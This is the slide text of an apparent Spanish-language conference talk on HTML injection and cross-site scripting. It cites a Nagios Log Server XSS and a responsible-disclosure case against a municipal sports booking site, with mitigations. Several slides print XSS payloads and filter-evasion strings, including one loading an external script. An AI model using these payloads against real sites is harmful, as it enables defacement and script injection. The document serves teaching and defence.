  • 6. https://c1b3rwall.policia.es/ OWASP TOP 10 Hay tres nuevas categorías, cuatro categorías con cambios de nombre y alcance, y alguna consolidación en el Top 10 de 2021. Hemos cambiado los nombres cuando ha sido necesario para centrarnos en la causa principal en lugar del síntoma. Source: https://owasp.org/Top10/es/
  • 7. https://c1b3rwall.policia.es/ HTML Injection La inyección HTML es un tipo de vulnerabilidad de inyección que ocurre cuando un usuario puede controlar un punto de entrada y puede inyectar código HTML arbitrario en una página web vulnerable.
  • 8. https://c1b3rwall.policia.es/ HTML Injection Un tercero podría aprovechar la incorrecta validación de entrada por parte del usuario para realizar un tipo de ataque que modifique el aspecto visual de la página denominado como defacement. Fuente: https://blog.segu-info.com.ar/2009/12/deface-twitter-por-un-ataque-del.html
  • 11. https://c1b3rwall.policia.es/ Cross-Site Scripting (XSS) Es una inyección de código malicioso, que se ejecutará en el navegador de la víctima. El script malicioso puede guardarse en el servidor web y ejecutarse cada vez que el usuario llame a la funcionalidad correspondiente. También se puede realizar sin ningún script guardado en el servidor web.
  • 12. https://c1b3rwall.policia.es/ Cross-Site Scripting (XSS) Reflected. Se descubrió una vulnerabilidad XSS reflected en Nagios Log Server (CVE-2021-35478). URL: GET /nagioslogserver/admin/audit-log?time=24h start= end= type= search= HTTP/1.1. La hora, el inicio, el final, el tipo y el parámetro de búsqueda eran vulnerables a Reflected XSS. GET /nagioslogserver/admin/audit-log?time=24h"><script>alert(1)</script> start= end= type= search= HTTP/1.1
  • 13. https://c1b3rwall.policia.es/ Cross-Site Scripting (XSS) Stored. El parámetro pp para los resultados por página en el registro de auditoría y la página del historial de alertas era vulnerable a Stored XSS.
  • 14. https://c1b3rwall.policia.es/ Exponiendo la verdad. Se descubrió una vulnerabilidad web dentro del patronato de deportes de un Ayuntamiento el cual un tercero podría aprovecharse del hecho de la ausencia de validación de la entrada por parte del usuario para realizar distintos tipos de ataques web. En concreto, a la hora de hacer clic en un espacio libre para reservar una pista deportiva, tecnologías como Jquery, Bootstrap, ASP.NET (2012) se encontraban totalmente desactualizados y fuera de soporte dando lugar a posibles exploits en recursos como exploit-db entre otros.
  • 15. https://c1b3rwall.policia.es/ Exponiendo la verdad. HTML Injection. Se pudo confirmar que el campo del formulario ‘Datos del envío del justificante’ no presentaba una restricción de caracteres especiales, en concreto los etiquetado de apertura y cierre de etiquetas como html ‘<‘,’>’, que podían permitir a un tercero inyectar código malicioso.
  • 17. https://c1b3rwall.policia.es/ Restricción de caracteres. La protección ASP.NET permitía que hubiese restricción de caracteres. Se probó un conjunto de payloads por un diccionario dado y se observó que solamente se podían inyectar ciertos caracteres. (Consejo para profesionales de red team el siguiente recurso XSS Filter Evasion by OWASP: https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html) Véase el caso del ejemplo: <h1/onmouseover='u0061lert(1)'>%00
  • 18. https://c1b3rwall.policia.es/ Exponiendo la verdad. ¿Y si probamos con etiquetas propias de JavaScript?...
  • 19. https://c1b3rwall.policia.es/ Exponiendo la verdad. 1. Dado este punto intenté ‘jugar’ con el servidor para ver en qué punto me aceptaba como máximo la inyección de caracteres. Por ejemplo tomé este payload: <script/src=//NJ.₨></script> y la respuesta del servidor fue la siguiente: Casi…. 2. Probé ahora con el siguiente payload más acotado: <script src=//a.io> . La respuesta del servidor vez fue la siguiente: 3. Fui a la consola y efectivamente vi que se hacia una llamada al recurso www.a.io . Es decir, se puede apuntar a cargar script malicioso y realizar una petición frente a ese script.
  • 20. https://c1b3rwall.policia.es/ Exponiendo la verdad. XSS. Como podía ejecutar de manera delimitada ciertos comandos, busqué el ansiado XSS, para ello utilicé Burpsuite y ejecuté un diccionario dentro de Intruder para realizar un ataque que no fuera manual para ser eficiente.
  • 21. https://c1b3rwall.policia.es/ Exponiendo la verdad. XSS. Se trata de un XSS reflected. No tiene una severidad tan alta como un stored podía llevar a cabo una ejecución de código malicioso.
  • 22. https://c1b3rwall.policia.es/ Medidas de mitigación. 1. Validar la entrada por parte del usuario. Los datos que no son de confianza son cualquier dato que un atacante pueda controlar, entradas de formulario HTML, cadenas de consulta, encabezados HTTP, incluso datos procedentes de una base de datos, ya que un atacante puede infringir la base de datos incluso si no pueden infringir la aplicación. 2. Implementar un ciclo de vida de desarrollo seguro SDLC en el que se involucre en un proceso de auditoría de código a los programadores encargados de lanzar un producto en un entorno de pre producción hasta un entorno final de producción. 3. Realizar auditorías continuas de código estático y código dinámico que puedan permitir detectar vulnerabilidades en el activo. 4. La aplicación no debe aceptar ningún script, carácter especial o código HTML en los campos cuando no sea necesario. Debe evitar los caracteres especiales que pueden resultar dañinos. Algunos de los personajes principales utilizados en los guiones que deben evitarse son los siguientes: < > ( ) ' “ / * ; : = { } `(comilla grave) % + ^ ! — x00-x20 (x es una notación hexadecimal; incluye Espacio, Tabulador, Retorno de carro y Avance de línea). 5. Habilitar una Política de Seguridad de Contenido (CSP) supone una defensa profunda para la mitigación de vulnerabilidades XSS. 6. Codificar todas las salidas dentro del sitio, es decir, sustituir caracteres de toda aquella cadena que desee mostrarse en pantalla por ejemplo sustituir los símbolos de menor y mayor que por sus codificaciones correspondientes para html: &lt; y &gt; respectivamente. 7. Uso del atributo Secure y HttpOnly en las cookies.
  • 23. https://c1b3rwall.policia.es/ Respuesta del organismo público. Finalmente el organismo público pudo subsanar la vulnerabilidad, ejecutó una de las recomendaciones que se propuso como era impedir la inyección de caracteres especiales y actualmente no es posible realizar este tipo de ataques web asi como enviaron un email de agradecimiento.
  • 24. https://c1b3rwall.policia.es/ Conclusiones. En conclusión, en esta ponencia he tratado de dar importancia a: • El proceso de ciberseguridad en una empresa ya sea dentro del sector privado o publico forma parte de todos. • Los organismos deberían de dejar de ver la ciberseguridad como un gasto. • Es recomendable realizar un ciclo de vida de desarrollo seguro en cualquier aplicación que se vaya a implementar en un sistema de producción. • En los organismos públicos y fruto de la transformación digital es adecuado que los profesionales de la ciberseguridad vayamos con ellos en ir transformando el ecosistema digital que tenemos en España hacia un espacio más seguro. • Lo más importante bajo mi punto de vista y si habéis visto los detalles que he dejado en los anteriores slides…